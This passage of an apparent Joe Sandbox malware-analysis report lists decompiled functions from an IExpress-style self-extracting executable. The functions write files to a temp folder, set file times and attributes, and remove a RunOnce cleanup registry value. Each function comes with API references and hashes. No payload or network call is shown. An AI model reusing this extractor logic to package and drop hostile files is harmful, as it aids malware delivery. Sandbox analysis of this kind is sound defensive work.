                                                          					E010C1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          					if(( *0x10c9a34 & 0x00000020) != 0) {
                                                          						E010C65E8( &_v268);
                                                          					}
                                                          					SetCurrentDirectoryA(".."); // executed
                                                          					_t22 =  &_v268;
                                                          					E010C2390( &_v268);
                                                          					_t11 =  *0x10c8a20; // 0x0
                                                          				}
                                                          				if( *0x10c9a40 != 1 && _t11 != 0) {
                                                          					_t11 = E010C1FE1(_t22); // executed
                                                          				}
                                                          				 *0x10c8a20 =  *0x10c8a20 & 0x00000000;
                                                          				return E010C6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                          			}













                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00C282E0,00000080,?,00000000), ref: 010C52F2
                                                          • DeleteFileA.KERNELBASE(00C282E0), ref: 010C52FA
                                                          • LocalFree.KERNEL32(00C282E0,?,00000000), ref: 010C5305
                                                          • LocalFree.KERNEL32(00C282E0), ref: 010C530C
                                                          • SetCurrentDirectoryA.KERNELBASE(010C11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C5363
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C5334
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 2833751637-1193786559
                                                          • Opcode ID: e27145f2800356476e99eb0c97ca0d315e3f960901a445b0c67b572bb34fd7e7
                                                          • Instruction ID: b85c25af405366af5b602411d335f584510e4a09c95eaad7c8bd1ca7b14b2dd9
                                                          • Opcode Fuzzy Hash: e27145f2800356476e99eb0c97ca0d315e3f960901a445b0c67b572bb34fd7e7
                                                          • Instruction Fuzzy Hash: 1221D135600208DFEB719B28DD08BAD37F0BB54B44F14819DE8C657198DBBAA884CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C1FE1(void* __ecx) {
                                                          				void* _v8;
                                                          				long _t4;
                                                          
                                                          				if( *0x10c8530 != 0) {
                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                          					if(_t4 == 0) {
                                                          						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                          						return RegCloseKey(_v8);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}






                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010C538C,?,?,010C538C), ref: 010C2005
                                                          • RegDeleteValueA.KERNELBASE(010C538C,wextract_cleanup0,?,?,010C538C), ref: 010C2017
                                                          • RegCloseKey.ADVAPI32(010C538C,?,?,010C538C), ref: 010C2020
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                          • API String ID: 849931509-702805525
                                                          • Opcode ID: 82b218e2d9883565c263a0d8344fd48088886b6c6206e64d41e8372f39e857ac
                                                          • Instruction ID: 005e48ab9b69964d424e0b2833599d606075ecdd306d3040e9ef7f4c01290d87
                                                          • Opcode Fuzzy Hash: 82b218e2d9883565c263a0d8344fd48088886b6c6206e64d41e8372f39e857ac
                                                          • Instruction Fuzzy Hash: A3E01A30650218FFEB318B91AC0EF5D7A6AE700B80F20019ABA84A1066E7A65A10DF08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C4CD0(char* __edx, long _a4, int _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				long _t32;
                                                          				signed int _t33;
                                                          				long _t35;
                                                          				long _t36;
                                                          				struct HWND__* _t37;
                                                          				long _t38;
                                                          				long _t39;
                                                          				long _t41;
                                                          				long _t44;
                                                          				long _t45;
                                                          				long _t46;
                                                          				signed int _t50;
                                                          				long _t51;
                                                          				char* _t58;
                                                          				long _t59;
                                                          				char* _t63;
                                                          				long _t64;
                                                          				CHAR* _t71;
                                                          				CHAR* _t74;
                                                          				int _t75;
                                                          				signed int _t76;
                                                          
                                                          				_t69 = __edx;
                                                          				_t29 =  *0x10c8004; // 0x4b13cf70
                                                          				_t30 = _t29 ^ _t76;
                                                          				_v8 = _t30;
                                                          				_t75 = _a8;
                                                          				if( *0x10c91d8 == 0) {
                                                          					_t32 = _a4;
                                                          					__eflags = _t32;
                                                          					if(_t32 == 0) {
                                                          						_t33 = E010C4E99(_t75);
                                                          						L35:
                                                          						return E010C6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                          					}
                                                          					_t35 = _t32 - 1;
                                                          					__eflags = _t35;
                                                          					if(_t35 == 0) {
                                                          						L9:
                                                          						_t33 = 0;
                                                          						goto L35;
                                                          					}
                                                          					_t36 = _t35 - 1;
                                                          					__eflags = _t36;
                                                          					if(_t36 == 0) {
                                                          						_t37 =  *0x10c8584; // 0x0
                                                          						__eflags = _t37;
                                                          						if(_t37 != 0) {
                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                          						}
                                                          						_t54 = 0x10c91e4;
                                                          						_t58 = 0x10c91e4;
                                                          						do {
                                                          							_t38 =  *_t58;
                                                          							_t58 =  &(_t58[1]);
                                                          							__eflags = _t38;
                                                          						} while (_t38 != 0);
                                                          						_t59 = _t58 - 0x10c91e5;
                                                          						__eflags = _t59;
                                                          						_t71 =  *(_t75 + 4);
                                                          						_t73 =  &(_t71[1]);
                                                          						do {
                                                          							_t39 =  *_t71;
                                                          							_t71 =  &(_t71[1]);
                                                          							__eflags = _t39;
                                                          						} while (_t39 != 0);
                                                          						_t69 = _t71 - _t73;
                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							L3:
                                                          							_t33 = _t30 | 0xffffffff;
                                                          							goto L35;
                                                          						}
                                                          						_t69 = 0x10c91e4;
                                                          						_t30 = E010C4702( &_v268, 0x10c91e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t41 = E010C476D( &_v268, __eflags);
                                                          						__eflags = _t41;
                                                          						if(_t41 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_push(0x180);
                                                          						_t30 = E010C4980( &_v268, 0x8302); // executed
                                                          						_t75 = _t30;
                                                          						__eflags = _t75 - 0xffffffff;
                                                          						if(_t75 == 0xffffffff) {
                                                          							goto L3;
                                                          						}
                                                          						_t30 = E010C47E0( &_v268);
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						 *0x10c93f4 =  *0x10c93f4 + 1;
                                                          						_t33 = _t75;
                                                          						goto L35;
                                                          					}
                                                          					_t44 = _t36 - 1;
                                                          					__eflags = _t44;
                                                          					if(_t44 == 0) {
                                                          						_t54 = 0x10c91e4;
                                                          						_t63 = 0x10c91e4;
                                                          						do {
                                                          							_t45 =  *_t63;
                                                          							_t63 =  &(_t63[1]);
                                                          							__eflags = _t45;
                                                          						} while (_t45 != 0);
                                                          						_t74 =  *(_t75 + 4);
                                                          						_t64 = _t63 - 0x10c91e5;
                                                          						__eflags = _t64;
                                                          						_t69 =  &(_t74[1]);
                                                          						do {
                                                          							_t46 =  *_t74;
                                                          							_t74 =  &(_t74[1]);
                                                          							__eflags = _t46;
                                                          						} while (_t46 != 0);
                                                          						_t73 = _t74 - _t69;
                                                          						_t30 = _t64 + 1 + _t74 - _t69;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 = 0x10c91e4;
                                                          						_t30 = E010C4702( &_v268, 0x10c91e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                          						_t30 = E010C4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						}
                                                          						E010C4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                          						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                          						__eflags = _t50;
                                                          						if(_t50 != 0) {
                                                          							_t51 = _t50 & 0x00000027;
                                                          							__eflags = _t51;
                                                          						} else {
                                                          							_t51 = 0x80;
                                                          						}
                                                          						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                          						__eflags = _t30;
                                                          						if(_t30 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t33 = 1;
                                                          							goto L35;
                                                          						}
                                                          					}
                                                          					_t30 = _t44 - 1;
                                                          					__eflags = _t30;
                                                          					if(_t30 == 0) {
                                                          						goto L3;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				if(_a4 == 3) {
                                                          					_t30 = E010C4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                          				}
                                                          				goto L3;
                                                          			}
































                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010C4DB5
                                                          • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010C4DDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AttributesFileItemText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 3625706803-1193786559
                                                          • Opcode ID: 0fcac0f4a30c0ebf4189190e0f1c3aba61b5a010a1227cb876c46da668da0bc6
                                                          • Instruction ID: d78f2ad99cb392530ed509209cd0c29ddb7e23f755cf5f9538e5040aed03e514
                                                          • Opcode Fuzzy Hash: 0fcac0f4a30c0ebf4189190e0f1c3aba61b5a010a1227cb876c46da668da0bc6
                                                          • Instruction Fuzzy Hash: 644103366041068ADB76BF2CD9A46FD77E5FB45B00F0486ACD8C2D7285DA32DA46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4C37(signed int __ecx, int __edx, int _a4) {
                                                          				struct _FILETIME _v12;
                                                          				struct _FILETIME _v20;
                                                          				FILETIME* _t14;
                                                          				int _t15;
                                                          				signed int _t21;
                                                          
                                                          				_t21 = __ecx * 0x18;
                                                          				if( *((intOrPtr*)(_t21 + 0x10c8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t14 =  &_v12;
                                                          					_t15 = SetFileTime( *(_t21 + 0x10c8d74), _t14, _t14, _t14); // executed
                                                          					if(_t15 == 0) {
                                                          						goto L5;
                                                          					}
                                                          					return 1;
                                                          				}
                                                          			}









                                                          APIs
                                                          • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010C4C54
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010C4C66
                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 010C4C7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Time$File$DateLocal
                                                          • String ID:
                                                          • API String ID: 2071732420-0
                                                          • Opcode ID: c0b3d09a6624de09fe0eacc9b760524aca864de75d803678a9509e5ea703afab
                                                          • Instruction ID: ed371cef526a72e8e4ebf40b9f2fe30c60beae0d17f09cd91075bbd979dd3f32
                                                          • Opcode Fuzzy Hash: c0b3d09a6624de09fe0eacc9b760524aca864de75d803678a9509e5ea703afab
                                                          • Instruction Fuzzy Hash: 0AF0C232A0010DAEABA09FA8CC889BF7BECFB04640704456FA981C2050F631D504CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010C487A(CHAR* __ecx, signed int __edx) {
                                                          				void* _t7;
                                                          				CHAR* _t11;
                                                          				long _t18;
                                                          				long _t23;
                                                          
                                                          				_t11 = __ecx;
                                                          				asm("sbb edi, edi");
                                                          				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                          				if((__edx & 0x00000100) == 0) {
                                                          					asm("sbb esi, esi");
                                                          					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                          				} else {
                                                          					if((__edx & 0x00000400) == 0) {
                                                          						asm("sbb esi, esi");
                                                          						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                          					} else {
                                                          						_t23 = 1;
                                                          					}
                                                          				}
                                                          				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                          				if(_t7 != 0xffffffff || _t23 == 3) {
                                                          					return _t7;
                                                          				} else {
                                                          					E010C490C(_t11);
                                                          					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                          				}
                                                          			}








                                                          APIs
                                                          • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010C4A23,?,010C4F67,*MEMCAB,00008000,00000180), ref: 010C48DE
                                                          • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010C4F67,*MEMCAB,00008000,00000180), ref: 010C4902
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 316b4db39b5c8e838fcb9ff7899f7f46f177d23d0bd8bae35959d70cb33421d8
                                                          • Instruction ID: d1f19c8e8b94e47a6a63019dadda059bbc0bb9548c07e61b05587f0e059e311a
                                                          • Opcode Fuzzy Hash: 316b4db39b5c8e838fcb9ff7899f7f46f177d23d0bd8bae35959d70cb33421d8
                                                          • Instruction Fuzzy Hash: F8016DA3E115742AF36442294C98FFF555CEBDAA34F1B0339BEEAE71C1D5644C0486E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C4AD0(signed int _a4, void* _a8, long _a12) {
                                                          				signed int _t9;
                                                          				int _t12;
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				void* _t20;
                                                          				struct HWND__* _t21;
                                                          				signed int _t24;
                                                          				signed int _t25;
                                                          
                                                          				_t20 =  *0x10c858c; // 0x268
                                                          				_t9 = E010C3680(_t20);
                                                          				if( *0x10c91d8 == 0) {
                                                          					_push(_t24);
                                                          					_t12 = WriteFile( *(0x10c8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                          					if(_t12 != 0) {
                                                          						_t25 = _a12;
                                                          						if(_t25 != 0xffffffff) {
                                                          							_t14 =  *0x10c9400; // 0x9e600
                                                          							_t15 = _t14 + _t25;
                                                          							 *0x10c9400 = _t15;
                                                          							if( *0x10c8184 != 0) {
                                                          								_t21 =  *0x10c8584; // 0x0
                                                          								if(_t21 != 0) {
                                                          									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10c93f8, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t25 = _t24 | 0xffffffff;
                                                          					}
                                                          					return _t25;
                                                          				} else {
                                                          					return _t9 | 0xffffffff;
                                                          				}
                                                          			}












                                                          APIs
                                                            • Part of subcall function 010C3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010C369F
                                                            • Part of subcall function 010C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36B2
                                                            • Part of subcall function 010C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010C36DA
                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010C4B05
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                          • String ID:
                                                          • API String ID: 1084409-0
                                                          • Opcode ID: 5f55042847877cf8a32f815263635d9f5bc61fd6f19ff56e494744922bfcf0f1
                                                          • Instruction ID: ff8a2dcbbde13cc9acf54295a2a61c697049e00a8a235b2d4b094466ee9951ca
                                                          • Opcode Fuzzy Hash: 5f55042847877cf8a32f815263635d9f5bc61fd6f19ff56e494744922bfcf0f1
                                                          • Instruction Fuzzy Hash: B90180312002059FD7248F58DC15BAA7B99F744B2AF04C269FAB9D71D4CB769811CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C658A(char* __ecx, void* __edx, char* _a4) {
                                                          				intOrPtr _t4;
                                                          				char* _t6;
                                                          				char* _t8;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				char* _t16;
                                                          				intOrPtr* _t17;
                                                          				void* _t18;
                                                          				char* _t19;
                                                          
                                                          				_t16 = __ecx;
                                                          				_t10 = __edx;
                                                          				_t17 = __ecx;
                                                          				_t1 = _t17 + 1; // 0x10c8b3f
                                                          				_t12 = _t1;
                                                          				do {
                                                          					_t4 =  *_t17;
                                                          					_t17 = _t17 + 1;
                                                          				} while (_t4 != 0);
                                                          				_t18 = _t17 - _t12;
                                                          				_t2 = _t18 + 1; // 0x10c8b40
                                                          				if(_t2 < __edx) {
                                                          					_t19 = _t18 + __ecx;
                                                          					if(_t19 > __ecx) {
                                                          						_t8 = CharPrevA(__ecx, _t19); // executed
                                                          						if( *_t8 != 0x5c) {
                                                          							 *_t19 = 0x5c;
                                                          							_t19 =  &(_t19[1]);
                                                          						}
                                                          					}
                                                          					_t6 = _a4;
                                                          					 *_t19 = 0;
                                                          					while( *_t6 == 0x20) {
                                                          						_t6 = _t6 + 1;
                                                          					}
                                                          					return E010C16B3(_t16, _t10, _t6);
                                                          				}
                                                          				return 0x8007007a;
                                                          			}













                                                          APIs
                                                          • CharPrevA.USER32(010C8B3E,010C8B3F,00000001,010C8B3E,-00000003,?,010C60EC,010C1140,?), ref: 010C65BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CharPrev
                                                          • String ID:
                                                          • API String ID: 122130370-0
                                                          • Opcode ID: 816e056de38a3b894202f0d71e85867d6e7dd44c684931f414d284ea0ef5f16c
                                                          • Instruction ID: 857b3c9c234c5a9ecf14d2ba4919a33ec510266d8f88467e0d5bb70788ca3a64
                                                          • Opcode Fuzzy Hash: 816e056de38a3b894202f0d71e85867d6e7dd44c684931f414d284ea0ef5f16c
                                                          • Instruction Fuzzy Hash: EDF042725082509FD331071D9884BAEBFDD9BE9550F38019EE9DAC3305DA674C458BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C621E() {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t5;
                                                          				void* _t9;
                                                          				void* _t13;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				signed int _t21;
                                                          
                                                          				_t5 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t5 ^ _t21;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					0x4f0 = 2;
                                                          					_t9 = E010C597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                          				} else {
                                                          					E010C44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t9 = 0;
                                                          				}
                                                          				return E010C6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                          			}












                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010C623F
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                          • String ID:
                                                          • API String ID: 381621628-0
                                                          • Opcode ID: 95d350ebbad1d95a225b9fe5530feed2696896c86bf175341f4741af61f494f1
                                                          • Instruction ID: 5427025dd42c723de9bfc3f84120757e6e5a2df36e05befa633550192589a768
                                                          • Opcode Fuzzy Hash: 95d350ebbad1d95a225b9fe5530feed2696896c86bf175341f4741af61f494f1
                                                          • Instruction Fuzzy Hash: 57F0B4B07002096FD770EB748D01BFE72A9DB54B00F50006EA9C5D7181ED7699408F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C4B60(signed int _a4) {
                                                          				signed int _t9;
                                                          				signed int _t15;
                                                          
                                                          				_t15 = _a4 * 0x18;
                                                          				if( *((intOrPtr*)(_t15 + 0x10c8d64)) != 1) {
                                                          					_t9 = FindCloseChangeNotification( *(_t15 + 0x10c8d74)); // executed
                                                          					if(_t9 == 0) {
                                                          						return _t9 | 0xffffffff;
                                                          					}
                                                          					 *((intOrPtr*)(_t15 + 0x10c8d60)) = 1;
                                                          					return 0;
                                                          				}
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d60)) = 1;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d68)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d70)) = 0;
                                                          				 *((intOrPtr*)(_t15 + 0x10c8d6c)) = 0;
                                                          				return 0;
                                                          			}






                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010C4FA1,00000000), ref: 010C4B98
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: 122bd7cc6b51a48c7388713983563a286686053811cee0541c31ef725129ec4b
                                                          • Instruction ID: de0750e5fb6ad020d44fb0dc01b5ef0c2d0d1f357bb10f059dbe26eaa92e7f88
                                                          • Opcode Fuzzy Hash: 122bd7cc6b51a48c7388713983563a286686053811cee0541c31ef725129ec4b
                                                          • Instruction Fuzzy Hash: 13F01271D00B09AE4771AF29DC0069FBBE6BA956613148D2FA5EED2150F7306441DF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C66AE(CHAR* __ecx) {
                                                          				unsigned int _t1;
                                                          
                                                          				_t1 = GetFileAttributesA(__ecx); // executed
                                                          				if(_t1 != 0xffffffff) {
                                                          					return  !(_t1 >> 4) & 0x00000001;
                                                          				} else {
                                                          					return 0;
                                                          				}
                                                          			}





                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,010C4777,?,010C4E38,?), ref: 010C66B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: e7642888bf18f1af8f95bf055a3a2d254b958f6a9e571c7a975b07031b9d3f26
